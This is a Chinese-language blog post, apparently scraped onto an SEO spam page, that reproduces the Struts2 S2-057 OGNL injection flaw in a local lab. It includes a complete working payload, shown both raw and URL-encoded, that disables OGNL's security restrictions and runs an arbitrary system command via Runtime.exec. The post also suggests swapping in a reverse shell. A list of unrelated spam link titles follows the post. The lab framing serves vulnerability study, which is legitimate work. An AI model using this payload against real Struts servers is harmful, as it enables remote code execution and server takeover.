当前位置: 首页 > wzjs >正文

微软网站设计济南计算机培训机构哪个最好

微软网站设计,济南计算机培训机构哪个最好,wordpress badages,青岛网页设计师漏洞原理:S2-057是由于 Struts 2框架对重定向URL处理不当导致的OGNL注入漏洞。攻击者通过构造特殊参数,可以在服务器上执行任意代码。漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时…

漏洞原理:

S2-057是由于 Struts 2框架对重定向URL处理不当导致的OGNL注入漏洞。攻击者通过构造特殊参数,可以在服务器上执行任意代码。漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。

靶场搭建:

可以根据我上篇文章去搭建,因为懒所以我就不在这多罗嗦了。直接复现。

漏洞复现:

先打开容器:http://localhost:8080/strusts2-showcase

然后我们先试一下下面的代码

/${(20+20)}/actionChain1.action # ()里面随便两数做运算就可以

填在上面路径的后面 

我们回车了一下,发下在url里面执行运算

 

所以说{()}里面的内容执行了,然后我们用下面的代码 

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}/actionChain1.action

 url编码后:

%24%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B'struts.valueStack'%5D.context).(%23cr%3D%23ct%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec('id')).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action

这时候我们bp抓包去看信息

我们可以对exec()里面的命令进行替换,也可以写入反弹shell

 

http://www.dtcms.com/wzjs/340524.html

相关文章:

  • 宁波网站建设公司哪家好网络安全培训
  • 泉州外贸b2c网站建设手机建站平台
  • 网站建设 业务板块名称网络兼职平台
  • 动态网站怎么做伪静态网站南京网站推广公司
  • 深圳乐从网站建设深圳营销推广公司
  • 宿迁做网站需要多少钱整站seo怎么做
  • 南阳网站建设口碑宁波seo网络推广公司排名
  • 南昌网站制作代理商网站外链代发
  • 可以用手机做网站吗微信推广链接怎么制作
  • swf影视网站源码专业制作网站的公司哪家好
  • 科技魏玄成网站优化关键词
  • 智能锁网站建设关键词廊坊seo
  • 做网站生意买螃蟹企业网站优化技巧
  • 西安微商城网站建设设计网站模板
  • 太原市网站建设网站东莞服务好的营销型网站建设
  • 企业网站程序制作小学生简短小新闻摘抄
  • 英国政府网站建设特点seo网站关键词优化费用
  • 网站模块数据同步个人网站首页设计
  • 网站后台模板关联自己做的网站网络营销软文范例500
  • 天善问答wordpressseo sem关键词优化
  • 企业网站管理系统项目文档工具
  • 网站怎么增加代码抖音竞价推广怎么做
  • 如何用二级域名做网站布奏微信营销方式有哪些
  • 宝安网站设计网站建设哪家快google推广及广告优缺点
  • 网站做适配换友情链接的网站
  • 忘记网站后台账号百度搜索关键词排行榜
  • 南阳手机网站建设专业培训大全
  • 广告投放数据分析跟我学seo
  • 椒江住房和城乡建设规划局网站5g影讯5g天线在线观看免费视频
  • 网站标题分隔符号windows优化大师win10